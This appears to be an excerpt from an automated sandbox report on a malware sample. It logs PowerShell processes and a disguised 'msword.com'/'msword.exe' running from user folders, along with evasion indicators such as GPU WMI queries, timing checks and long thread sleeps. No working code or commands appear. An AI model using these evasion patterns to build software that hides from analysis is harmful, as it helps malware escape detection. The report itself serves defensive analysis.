Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comMemory allocated: 21762780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comMemory allocated: 2177AA60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comMemory allocated: 2177B310000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msword.exeMemory allocated: 17FD2E70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msword.exeMemory allocated: 17FEAFB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00EC89A0 rdtscp17_2_00EC89A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1949Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4485Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4711Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3865Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5883Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 789Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6402
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2496
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comWindow / User API: threadDelayed 4935
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comWindow / User API: threadDelayed 4909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4167
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4813
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2778
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2357
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5674
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 4711 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 3865 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -21213755684765971s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7784Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep count: 5883 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 789 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8492Thread sleep count: 6402 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8492Thread sleep count: 2496 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8524Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\msword\msword.com TID: 9176Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\msword\msword.com TID: 9180Thread sleep count: 4935 > 30
Source: C:\Users\user\AppData\Local\Temp\msword\msword.com TID: 9180Thread sleep count: 4909 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8600Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep count: 5406 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep count: 2778 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8256Thread sleep time: -1844674407370954s >= -30000s
